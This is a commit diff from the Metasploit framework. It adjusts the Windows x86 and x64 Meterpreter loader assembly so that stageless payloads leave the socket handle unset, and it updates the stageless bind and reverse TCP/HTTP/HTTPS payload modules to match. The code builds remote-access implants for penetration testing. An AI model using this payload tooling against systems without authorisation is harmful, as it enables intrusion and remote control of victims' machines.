Prevent stagless from overwriting socket

Stageless payloads need to have the socket FD left along (ie. 0)
otherwise each of them will think that the socket is already open.
Instead we need to make sure it's left as 0 as per the configuration and
from there the stageless code will fire up a new socket based on the
transport in question.

Author: OJ

lib/msf/core/payload/windows/meterpreter_loader.rb

@@ -50,21 +50,30 @@ def asm_invoke_metsrv(opts={})
         ; Invoke DllMain(hInstance, DLL_METASPLOIT_ATTACH, config_ptr)
           ; offset from ReflectiveLoader() to the end of the DLL
           add ebx, #{"0x%.8x" % (opts[:length] - opts[:rdi_offset])}
+    ^
+
+    unless opts[:stageless]
+      asm << %Q^
           mov [ebx], edi        ; write the current socket to the config
+      ^
+    end
+
+    asm << %Q^
           push ebx              ; push the pointer to the configuration start
           push 4                ; indicate that we have attached
           push eax              ; push some arbitrary value for hInstance
           call eax              ; call DllMain(hInstance, DLL_METASPLOIT_ATTACH, config_ptr)
     ^
   end
 
-  def stage_meterpreter
+  def stage_meterpreter(stageless=false)
     # Exceptions will be thrown by the mixin if there are issues.
     dll, offset = load_rdi_dll(MeterpreterBinaries.path('metsrv', 'x86.dll'))
 
     asm_opts = {
       :rdi_offset => offset,
-      :length     => dll.length
+      :length     => dll.length,
+      :stageless  => stageless
     }
 
     asm = asm_invoke_metsrv(asm_opts)

lib/msf/core/payload/windows/x64/meterpreter_loader.rb

@@ -52,22 +52,31 @@ def asm_invoke_metsrv(opts={})
         ; Invoke DllMain(hInstance, DLL_METASPLOIT_ATTACH, config_ptr)
           ; offset from ReflectiveLoader() to the end of the DLL
           add rbx, #{"0x%.8x" % (opts[:length] - opts[:rdi_offset])}
+    ^
+
+    unless opts[:stageless]
+      asm << %Q^
           ; store the comms socket handle
           mov dword ptr [rbx], edi
+      ^
+    end
+
+    asm << %Q^
           mov r8, rbx           ; r8 points to the extension list
           push 4                ; push up 4, indicate that we have attached
           pop rdx               ; pop 4 into rdx
           call rax              ; call DllMain(hInstance, DLL_METASPLOIT_ATTACH, config_ptr)
     ^
   end
 
-  def stage_meterpreter
+  def stage_meterpreter(stageless=false)
     # Exceptions will be thrown by the mixin if there are issues.
     dll, offset = load_rdi_dll(MeterpreterBinaries.path('metsrv', 'x64.dll'))
 
     asm_opts = {
       :rdi_offset => offset,
-      :length     => dll.length
+      :length     => dll.length,
+      :stageless  => stageless
     }
 
     asm = asm_invoke_metsrv(asm_opts)

modules/payloads/singles/windows/meterpreter_bind_tcp.rb

@@ -6,7 +6,7 @@
 require 'msf/core'
 require 'msf/core/transport_config'
 require 'msf/core/handler/bind_tcp'
-require 'msf/core/payload/windows/_meterpreter_loader'
+require 'msf/core/payload/windows/meterpreter_loader'
 require 'msf/base/sessions/meterpreter_x86_win'
 require 'msf/base/sessions/meterpreter_options'
 
@@ -39,7 +39,7 @@ def initialize(info = {})
   end
 
   def generate
-    stage_meterpreter + generate_config
+    stage_meterpreter(true) + generate_config
   end
 
   def generate_config(opts={})

modules/payloads/singles/windows/meterpreter_reverse_http.rb

@@ -39,7 +39,7 @@ def initialize(info = {})
   end
 
   def generate
-    stage_meterpreter + generate_config
+    stage_meterpreter(true) + generate_config
   end
 
   def generate_config(opts={})

modules/payloads/singles/windows/meterpreter_reverse_https.rb

@@ -39,7 +39,7 @@ def initialize(info = {})
   end
 
   def generate
-    stage_meterpreter + generate_config
+    stage_meterpreter(true) + generate_config
   end
 
   def generate_config(opts={})

modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb

@@ -40,7 +40,7 @@ def initialize(info = {})
   end
 
   def generate
-    stage_meterpreter + generate_config
+    stage_meterpreter(true) + generate_config
   end
 
   def generate_config(opts={})

modules/payloads/singles/windows/meterpreter_reverse_tcp.rb

@@ -4,6 +4,7 @@
 ##
 
 require 'msf/core'
+require 'msf/core/transport_config'
 require 'msf/core/handler/reverse_tcp'
 require 'msf/core/payload/windows/meterpreter_loader'
 require 'msf/base/sessions/meterpreter_x86_win'
@@ -13,6 +14,7 @@ module Metasploit3
 
   CachedSize = :dynamic
 
+  include Msf::TransportConfig
   include Msf::Payload::Windows
   include Msf::Payload::Single
   include Msf::Payload::Windows::MeterpreterLoader
@@ -37,7 +39,7 @@ def initialize(info = {})
   end
 
   def generate
-    stage_meterpreter + generate_config
+    stage_meterpreter(true) + generate_config
   end
 
   def generate_config(opts={})

modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb

@@ -39,7 +39,7 @@ def initialize(info = {})
   end
 
   def generate
-    stage_meterpreter + generate_config
+    stage_meterpreter(true) + generate_config
   end
 
   def generate_config(opts={})

modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb

@@ -38,7 +38,7 @@ def initialize(info = {})
   end
 
   def generate
-    stage_meterpreter + generate_config
+    stage_meterpreter(true) + generate_config
   end
 
   def generate_config(opts={})

modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb

@@ -39,7 +39,7 @@ def initialize(info = {})
   end
 
   def generate
-    stage_meterpreter + generate_config
+    stage_meterpreter(true) + generate_config
   end
 
   def generate_config(opts={})